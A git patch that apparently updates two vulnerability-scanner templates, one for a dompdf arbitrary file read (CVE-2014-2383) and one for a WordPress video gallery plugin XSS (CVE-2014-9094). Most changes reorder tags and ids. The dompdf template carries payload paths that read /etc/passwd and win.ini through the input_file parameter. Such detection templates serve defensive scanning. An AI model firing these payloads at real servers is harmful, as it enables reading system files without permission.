From bcb594fc56bced7b33a40dce7db9cb08bb147d79 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 21 Sep 2021 15:46:26 +0530 Subject: [PATCH] more updates --- cves/2014/CVE-2014-2383.yaml | 10 +++++----- cves/2014/CVE-2014-9094.yaml | 5 ++--- 2 files changed, 7 insertions(+), 8 deletions(-) diff --git a/cves/2014/CVE-2014-2383.yaml b/cves/2014/CVE-2014-2383.yaml index 7607410c38..07726343d2 100644 --- a/cves/2014/CVE-2014-2383.yaml +++ b/cves/2014/CVE-2014-2383.yaml @@ -1,14 +1,14 @@ -id: arbitrary-file-read-in-dompdf +id: CVE-2014-2383 info: name: Arbitrary file read in dompdf < v0.6.0 author: 0x_Akoko severity: high reference: https://www.exploit-db.com/exploits/33004 - tags: dompdf,lfi - -# - "/dompdf.php?input_file=C:/windows/win.ini" -# - "/dompdf.php?input_file=/etc/passwd" + tags: cve,cve2014,dompdf,lfi + metadata: + win-payload: "/dompdf.php?input_file=C:/windows/win.ini" + unix-payload: "/dompdf.php?input_file=/etc/passwd" requests: - method: GET diff --git a/cves/2014/CVE-2014-9094.yaml b/cves/2014/CVE-2014-9094.yaml index 12b29d2090..8e73d7da9b 100644 --- a/cves/2014/CVE-2014-9094.yaml +++ b/cves/2014/CVE-2014-9094.yaml @@ -4,9 +4,9 @@ info: name: WordPress DZS-VideoGallery Plugin Reflected Cross Site Scripting author: daffainfo severity: medium - reference: https://nvd.nist.gov/vuln/detail/CVE-2014-9094 - tags: cve,2014,wordpress,xss,wp-plugin description: "Multiple cross-site scripting (XSS) vulnerabilities in deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video Gallery plugin for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) swfloc or (2) designrand parameter." + reference: https://nvd.nist.gov/vuln/detail/CVE-2014-9094 + tags: cve,cve2014,wordpress,xss,wp-plugin requests: - method: GET @@ -18,7 +18,6 @@ requests: - type: word words: - "" - part: body - type: word part: header